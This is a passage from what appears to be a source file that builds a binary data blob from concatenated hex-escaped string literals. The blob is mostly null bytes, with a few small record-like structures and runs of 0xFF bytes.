+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\xDA\x5A\x7D\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x0E\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\xEE\x87\x06\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\xF5\x07\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA9\xB4\xFA\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x39\x7E\x0E\xB6\xBD\xA0\x8A\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x6A\x65\x35\xC2\x5F\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x44\x7C\x53\xEA\x34\x4A\x23\xDC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x90\x32\xC1\x56\x12". + "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD9\x4A\x62\xB2\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xEB\xF5". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x76\xDE\xA6\xCB\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\xFB\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAF\x94\xC4\x79". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB6\xEC". + "\x03\xBE\x20\x61\x95\x33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x65\x0F\xC2\x11\xE6\x00\x43\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD4\x5E\x7C\x3F\x92\xC6\x3A\xA7\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x90\xF4\xC1\x01\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x11\x01". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + 